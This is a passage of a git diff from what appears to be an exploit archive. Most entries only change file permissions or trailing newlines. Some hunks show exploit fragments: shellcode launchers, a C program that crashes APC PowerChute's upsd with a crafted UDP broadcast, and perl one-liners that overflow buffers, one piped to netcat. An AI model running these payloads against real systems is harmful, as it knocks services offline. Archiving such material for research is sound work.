b/platforms/lin_x86/shellcode/13716.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13722.c b/platforms/lin_x86/shellcode/13722.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13723.c b/platforms/lin_x86/shellcode/13723.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13724.c b/platforms/lin_x86/shellcode/13724.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13725.txt b/platforms/lin_x86/shellcode/13725.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13726.txt b/platforms/lin_x86/shellcode/13726.txt old mode 100755 new mode 100644 index 2f778885f..cabce833a --- a/platforms/lin_x86/shellcode/13726.txt +++ b/platforms/lin_x86/shellcode/13726.txt @@ -37,4 +37,4 @@ int main(void) door(); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13728.c b/platforms/lin_x86/shellcode/13728.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13730.c b/platforms/lin_x86/shellcode/13730.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13731.c b/platforms/lin_x86/shellcode/13731.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13732.c b/platforms/lin_x86/shellcode/13732.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13742.c b/platforms/lin_x86/shellcode/13742.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13743.c b/platforms/lin_x86/shellcode/13743.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13910.c b/platforms/lin_x86/shellcode/13910.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/14119.c b/platforms/lin_x86/shellcode/14119.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/14216.c b/platforms/lin_x86/shellcode/14216.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/14332.c b/platforms/lin_x86/shellcode/14332.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/14334.c b/platforms/lin_x86/shellcode/14334.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/14691.c b/platforms/lin_x86/shellcode/14691.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/17194.txt b/platforms/lin_x86/shellcode/17194.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/17371.txt b/platforms/lin_x86/shellcode/17371.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/17559.c b/platforms/lin_x86/shellcode/17559.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/18294.c b/platforms/lin_x86/shellcode/18294.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/18379.c b/platforms/lin_x86/shellcode/18379.c old mode 100755 new mode 100644 index 93d95bd84..4ab934257 --- a/platforms/lin_x86/shellcode/18379.c +++ b/platforms/lin_x86/shellcode/18379.c @@ -353,4 +353,4 @@ int main() printf("%d\n", strlen(shellcode)); (*(void (*)()) shellcode)(); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/18885.c b/platforms/lin_x86/shellcode/18885.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/20195.c b/platforms/lin_x86/shellcode/20195.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/20196.c b/platforms/lin_x86/shellcode/20196.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/23622.c b/platforms/lin_x86/shellcode/23622.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/25497.c b/platforms/lin_x86/shellcode/25497.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/28474.c b/platforms/lin_x86/shellcode/28474.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/34060.c b/platforms/lin_x86/shellcode/34060.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/34262.c b/platforms/lin_x86/shellcode/34262.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/34592.c b/platforms/lin_x86/shellcode/34592.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/34778.c b/platforms/lin_x86/shellcode/34778.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/35519.txt b/platforms/lin_x86/shellcode/35519.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36391.c b/platforms/lin_x86/shellcode/36391.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36393.c b/platforms/lin_x86/shellcode/36393.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36394.c b/platforms/lin_x86/shellcode/36394.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36395.c b/platforms/lin_x86/shellcode/36395.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36397.c b/platforms/lin_x86/shellcode/36397.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36398.c b/platforms/lin_x86/shellcode/36398.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36637.c b/platforms/lin_x86/shellcode/36637.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36672.asm b/platforms/lin_x86/shellcode/36672.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36701.c b/platforms/lin_x86/shellcode/36701.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36750.c b/platforms/lin_x86/shellcode/36750.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36778.c b/platforms/lin_x86/shellcode/36778.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36857.c b/platforms/lin_x86/shellcode/36857.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36908.c b/platforms/lin_x86/shellcode/36908.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/36921.c b/platforms/lin_x86/shellcode/36921.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37069.c b/platforms/lin_x86/shellcode/37069.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37251.asm b/platforms/lin_x86/shellcode/37251.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37285.txt b/platforms/lin_x86/shellcode/37285.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37289.txt b/platforms/lin_x86/shellcode/37289.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37297.txt b/platforms/lin_x86/shellcode/37297.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37358.c b/platforms/lin_x86/shellcode/37358.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37359.c b/platforms/lin_x86/shellcode/37359.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37365.c b/platforms/lin_x86/shellcode/37365.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37366.c b/platforms/lin_x86/shellcode/37366.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37384.c b/platforms/lin_x86/shellcode/37384.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37390.asm b/platforms/lin_x86/shellcode/37390.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37391.asm b/platforms/lin_x86/shellcode/37391.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37392.asm b/platforms/lin_x86/shellcode/37392.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37393.asm b/platforms/lin_x86/shellcode/37393.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/37749.c b/platforms/lin_x86/shellcode/37749.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/38088.c b/platforms/lin_x86/shellcode/38088.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/38116.c b/platforms/lin_x86/shellcode/38116.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/39160.c b/platforms/lin_x86/shellcode/39160.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/39204.c b/platforms/lin_x86/shellcode/39204.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/39389.c b/platforms/lin_x86/shellcode/39389.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/39722.c b/platforms/lin_x86/shellcode/39722.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/39723.c b/platforms/lin_x86/shellcode/39723.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/39851.c b/platforms/lin_x86/shellcode/39851.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/39901.c b/platforms/lin_x86/shellcode/39901.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40026.txt b/platforms/lin_x86/shellcode/40026.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40056.c b/platforms/lin_x86/shellcode/40056.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40075.c b/platforms/lin_x86/shellcode/40075.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40110.c b/platforms/lin_x86/shellcode/40110.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40131.c b/platforms/lin_x86/shellcode/40131.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40179.c b/platforms/lin_x86/shellcode/40179.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40222.c b/platforms/lin_x86/shellcode/40222.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40223.c b/platforms/lin_x86/shellcode/40223.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40827.c b/platforms/lin_x86/shellcode/40827.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40872.c b/platforms/lin_x86/shellcode/40872.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/40924.c b/platforms/lin_x86/shellcode/40924.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41282.nasm b/platforms/lin_x86/shellcode/41282.nasm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41403.c b/platforms/lin_x86/shellcode/41403.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41630.asm b/platforms/lin_x86/shellcode/41630.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41631.c b/platforms/lin_x86/shellcode/41631.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41635.txt b/platforms/lin_x86/shellcode/41635.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41723.c b/platforms/lin_x86/shellcode/41723.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41757.txt b/platforms/lin_x86/shellcode/41757.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41909.c b/platforms/lin_x86/shellcode/41909.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/41969.c b/platforms/lin_x86/shellcode/41969.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/42177.c b/platforms/lin_x86/shellcode/42177.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/42208.nasm b/platforms/lin_x86/shellcode/42208.nasm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/42254.c b/platforms/lin_x86/shellcode/42254.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/42295.c b/platforms/lin_x86/shellcode/42295.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/42428.c b/platforms/lin_x86/shellcode/42428.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/42594.c b/platforms/lin_x86/shellcode/42594.c old mode 100755 new mode 100644 index bcaa3ff36..799c043e2 --- a/platforms/lin_x86/shellcode/42594.c +++ b/platforms/lin_x86/shellcode/42594.c @@ -56,4 +56,4 @@ int (*ret)() = (int(*)())code; ret(); -} +} \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/42977.c b/platforms/lin_x86/shellcode/42977.c old mode 100755 new mode 100644 index 6cd8948fc..255bd2d99 --- a/platforms/lin_x86/shellcode/42977.c +++ b/platforms/lin_x86/shellcode/42977.c @@ -49,5 +49,4 @@ int main() printf("Length: %d bytes\n", strlen(code)); (*(void(*)()) code)(); return 0; -} - +} \ No newline at end of file diff --git a/platforms/lin_x86/webapps/34030.txt b/platforms/lin_x86/webapps/34030.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/10017.c b/platforms/linux/dos/10017.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/10022.c b/platforms/linux/dos/10022.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/10184.txt b/platforms/linux/dos/10184.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/10202.c b/platforms/linux/dos/10202.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/10203.txt b/platforms/linux/dos/10203.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/10206.txt b/platforms/linux/dos/10206.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/10617.txt b/platforms/linux/dos/10617.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/10634.txt b/platforms/linux/dos/10634.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/11.c b/platforms/linux/dos/11.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/11044.txt b/platforms/linux/dos/11044.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/115.c b/platforms/linux/dos/115.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/11770.txt b/platforms/linux/dos/11770.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/11932.txt b/platforms/linux/dos/11932.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/1196.c b/platforms/linux/dos/1196.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/12095.txt b/platforms/linux/dos/12095.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/12334.c b/platforms/linux/dos/12334.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/12588.txt b/platforms/linux/dos/12588.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/14452.txt b/platforms/linux/dos/14452.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/14573.txt b/platforms/linux/dos/14573.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/14904.txt b/platforms/linux/dos/14904.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15062.txt b/platforms/linux/dos/15062.txt old mode 100755 new mode 100644 index 04f83f67b..5bc5b3f4d --- a/platforms/linux/dos/15062.txt +++ b/platforms/linux/dos/15062.txt @@ -105,9 +105,4 @@ PoC ./rarcrack `perl -e 'print "A" x500'` -########################################################################### - - - - - \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/linux/dos/15293.txt b/platforms/linux/dos/15293.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15463.txt b/platforms/linux/dos/15463.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15464.txt b/platforms/linux/dos/15464.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15619.c b/platforms/linux/dos/15619.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15622.c b/platforms/linux/dos/15622.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15705.txt b/platforms/linux/dos/15705.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15732.txt b/platforms/linux/dos/15732.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15935.c b/platforms/linux/dos/15935.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/15974.txt b/platforms/linux/dos/15974.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16129.txt b/platforms/linux/dos/16129.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16182.txt b/platforms/linux/dos/16182.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16216.txt b/platforms/linux/dos/16216.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16263.c b/platforms/linux/dos/16263.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16270.c b/platforms/linux/dos/16270.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/1657.asm b/platforms/linux/dos/1657.asm old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16952.c b/platforms/linux/dos/16952.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16960.txt b/platforms/linux/dos/16960.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16966.php b/platforms/linux/dos/16966.php old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/16973.c b/platforms/linux/dos/16973.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/17004.txt b/platforms/linux/dos/17004.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/17222.c b/platforms/linux/dos/17222.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/17400.c b/platforms/linux/dos/17400.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/17769.c b/platforms/linux/dos/17769.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/17806.txt b/platforms/linux/dos/17806.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/1815.c b/platforms/linux/dos/1815.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/18221.c b/platforms/linux/dos/18221.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/18225.c b/platforms/linux/dos/18225.c old mode 100755 new mode 100644 index 76917190c..fe2bc72e9 --- a/platforms/linux/dos/18225.c +++ b/platforms/linux/dos/18225.c @@ -103,7 +103,4 @@ esp 0xbffff310 0xbffff310 ========================================================================= N0 ExpLoiT ScRipt KiiiD'z -Gr33T'z : ALL My Friends .............. - - - \ No newline at end of file +Gr33T'z : ALL My Friends .............. \ No newline at end of file diff --git a/platforms/linux/dos/18278.txt b/platforms/linux/dos/18278.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/18295.txt b/platforms/linux/dos/18295.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/18378.c b/platforms/linux/dos/18378.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/18436.txt b/platforms/linux/dos/18436.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/1852.c b/platforms/linux/dos/1852.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/18579.txt b/platforms/linux/dos/18579.txt old mode 100755 new mode 100644 index 56219f936..a7c66c52e --- a/platforms/linux/dos/18579.txt +++ b/platforms/linux/dos/18579.txt @@ -102,5 +102,4 @@ References ========== [1] http://cwe.mitre.org/data/definitions/415.html [2] http://docs.python.org/release/1.5.2p2/ext/parseTuple.html -[3] https://issues.rpath.com/browse/RPL-2773 - \ No newline at end of file +[3] https://issues.rpath.com/browse/RPL-2773 \ No newline at end of file diff --git a/platforms/linux/dos/1880.c b/platforms/linux/dos/1880.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/18855.txt b/platforms/linux/dos/18855.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19075.c b/platforms/linux/dos/19075.c old mode 100755 new mode 100644 index 33eb197aa..9c91413e2 --- a/platforms/linux/dos/19075.c +++ b/platforms/linux/dos/19075.c @@ -1,16 +1,16 @@ -source: http://www.securityfocus.com/bid/83/info - -APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549. - -A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of the product. - -It has also been reported the software will crash in some instances when port scanned. - -It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software. - -Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them. - ------ begin downupsd.c ----- +// source: http://www.securityfocus.com/bid/83/info +// +// APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549. +// +// A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of the product. +// +// It has also been reported the software will crash in some instances when port scanned. +// +// It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software. +// +// Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them. +// +// ----- begin downupsd.c ----- #include <stdio.h> #include <stdlib.h> #include <unistd.h> @@ -28,13 +28,13 @@ struct sockaddr_in toaddr, fromaddr; struct hostent h_ent; if(argc!=2) { -fprintf(stderr, "Usage:\n\t%s <hostname running upsd>\n", argv[0]); +fprintf(stderr, ""Usage:\n\t%s <hostname running upsd>\n"", argv[0]); exit(0); } s = socket(AF_INET,SOCK_DGRAM,0); setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on)); -printf("Crashing upsd on host's subnet: %s\n", argv[1]); +printf(""Crashing upsd on host's subnet: %s\n"", argv[1]); toaddr.sin_family = AF_INET; toaddr.sin_port = htons(0); @@ -44,11 +44,11 @@ toaddr.sin_port = htons(6549); memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent)); memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr)); toaddr.sin_addr.s_addr |= 0xff000000; -strcpy(buffer, "027|1|public|9|0|0|2010~|0\0"); +strcpy(buffer, ""027|1|public|9|0|0|2010~|0\0""); sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in)); -printf("Crashed...\n"); +printf(""Crashed...\n""); close(s); } diff --git a/platforms/linux/remote/19076.txt b/platforms/linux/dos/19076.txt old mode 100755 new mode 100644 similarity index 100% rename from platforms/linux/remote/19076.txt rename to platforms/linux/dos/19076.txt diff --git a/platforms/linux/dos/19082.txt b/platforms/linux/dos/19082.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19085.c b/platforms/linux/dos/19085.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19103.c b/platforms/linux/dos/19103.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19241.c b/platforms/linux/dos/19241.c old mode 100755 new mode 100644 index da6f8779c..61e66a3d6 --- a/platforms/linux/dos/19241.c +++ b/platforms/linux/dos/19241.c @@ -120,4 +120,4 @@ void main(int argc, char **argv) fflush(stdout); } close(sock); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/19250.txt b/platforms/linux/dos/19250.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19271.c b/platforms/linux/dos/19271.c old mode 100755 new mode 100644 index feced69d6..a10034afb --- a/platforms/linux/dos/19271.c +++ b/platforms/linux/dos/19271.c @@ -122,4 +122,4 @@ pthread_create(&j,NULL,Thread2,NULL); while(1) sleep(1); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/19272.txt b/platforms/linux/dos/19272.txt old mode 100755 new mode 100644 index fa0831400..4a6feba2e --- a/platforms/linux/dos/19272.txt +++ b/platforms/linux/dos/19272.txt @@ -10,4 +10,4 @@ Take any core file, [user@box tmp]$ ldd core -[reboot] \ No newline at end of file +[reboot] \ No newline at end of file diff --git a/platforms/linux/dos/19282.c b/platforms/linux/dos/19282.c old mode 100755 new mode 100644 index 1d478301b..fb15a370d --- a/platforms/linux/dos/19282.c +++ b/platforms/linux/dos/19282.c @@ -341,4 +341,4 @@ usleep(SLEEP_UTIME); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/19301.c b/platforms/linux/dos/19301.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19308.c b/platforms/linux/dos/19308.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19463.c b/platforms/linux/dos/19463.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19605.c b/platforms/linux/dos/19605.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19675.c b/platforms/linux/dos/19675.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19818.c b/platforms/linux/dos/19818.c old mode 100755 new mode 100644 index b6b686506..bc45ee591 --- a/platforms/linux/dos/19818.c +++ b/platforms/linux/dos/19818.c @@ -27,4 +27,4 @@ strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) ); LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 ); sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) ); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/19850.c b/platforms/linux/dos/19850.c old mode 100755 new mode 100644 index 089b4c5c9..e08b3c5b0 --- a/platforms/linux/dos/19850.c +++ b/platforms/linux/dos/19850.c @@ -27,4 +27,4 @@ main() { shutdown(s,2); close(s); } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/19869.txt b/platforms/linux/dos/19869.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19950.c b/platforms/linux/dos/19950.c old mode 100755 new mode 100644 index f7a7d57e3..25a01dfc9 --- a/platforms/linux/dos/19950.c +++ b/platforms/linux/dos/19950.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/1235/info A denial of service exists in XFree86 3.3.5, 3.3.6 and 4.0. A remote user can send a malformed packet to the TCP listening port, 6000, which will cause the X server to be unresponsive for some period of time. During this time, the keyboard will not respond to user input, and in some cases, the mouse will also not respond. During this time period, the X server will utilize 100% of the CPU, and can only be repaired by being signaled. This vulnerability exists only in servers compiled with the XCSECURITY #define set. This can be verified by running the following: @@ -21,6 +22,7 @@ nPolicies--; So, the counter "nPolicies", if seeded with -1, will decrement towards about minus 2 billion, then wrap to become positive 2 billion, and head towards its final destination of 0." +*/ /* bust_x.c * Demonstration purposes only! diff --git a/platforms/linux/dos/20023.c b/platforms/linux/dos/20023.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/20025.txt b/platforms/linux/dos/20025.txt old mode 100755 new mode 100644 index f4ab9aeea..fd1c7566a --- a/platforms/linux/dos/20025.txt +++ b/platforms/linux/dos/20025.txt @@ -25,4 +25,4 @@ program vers proto port 100000 2 udp 111 portmapper 100024 1 udp 831 status 100024 1 tcp 833 status -[root@hiro /]# \ No newline at end of file +[root@hiro /]# \ No newline at end of file diff --git a/platforms/linux/dos/20026.c b/platforms/linux/dos/20026.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/20167.txt b/platforms/linux/dos/20167.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/20217.c b/platforms/linux/dos/20217.txt old mode 100755 new mode 100644 similarity index 100% rename from platforms/linux/dos/20217.c rename to platforms/linux/dos/20217.txt diff --git a/platforms/linux/dos/20388.txt b/platforms/linux/dos/20388.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/2051.py b/platforms/linux/dos/2051.py index 52a61ac74..529472ca1 100755 --- a/platforms/linux/dos/2051.py +++ b/platforms/linux/dos/2051.py @@ -294,5 +294,4 @@ xpl=substr(xpl, newtag, idx) xpl=substr(xpl,atom,len(xpl)) """ -# milw0rm.com [2006-07-21] - \ No newline at end of file +# milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/platforms/linux/dos/20535.txt b/platforms/linux/dos/20535.txt old mode 100755 new mode 100644 index 8fd428a18..15e3dacd8 --- a/platforms/linux/dos/20535.txt +++ b/platforms/linux/dos/20535.txt @@ -4,4 +4,4 @@ ReiserFS is a file system alternative to the Linux ext2 file system. It was orig A problem has been reported in the handling of long file names with ReiserFS version 3.5.28 on SuSE Linux distribution 7.0. It is possible to create a directory with a long file name (the initial example displayed a directory with 768 characters), then attempt to list the file system using system binary ls or with built in shell function echo and create a Denial of Service. Upon attempting to list or echo the contents of the filesystem, a kernel buffer overflow occurs, overwriting variables on the stack including possibly the return address, as well as crashing the system. It may be possible for a malicious user to execute arbitrary code, deny service to legitimate users, and potentially break out of a chroot environment. This vulnerability is yet unverified. -mkdir "$(perl -e 'print "x" x 768')" \ No newline at end of file +mkdir "$(perl -e 'print "x" x 768')" \ No newline at end of file diff --git a/platforms/linux/dos/20536.java b/platforms/linux/dos/20536.java old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/20562.c b/platforms/linux/dos/20562.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/20566.c b/platforms/linux/dos/20566.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/20747.txt b/platforms/linux/dos/20747.txt old mode 100755 new mode 100644 index 405a3baf1..e80118008 --- a/platforms/linux/dos/20747.txt +++ b/platforms/linux/dos/20747.txt @@ -6,4 +6,4 @@ A request string could be constructed to trigger the overflow and allow a malici Assuming the OAS prefix is /jsp/ and the vulnerable host is 'victim', the following command issued by the attacker will cause the iWS to coredump: -perl -e 'print "GET /jsp/","A"x2050," HTTP/1.0\n\n"' | nc victim 80 \ No newline at end of file +perl -e 'print "GET /jsp/","A"x2050," HTTP/1.0\n\n"' | nc 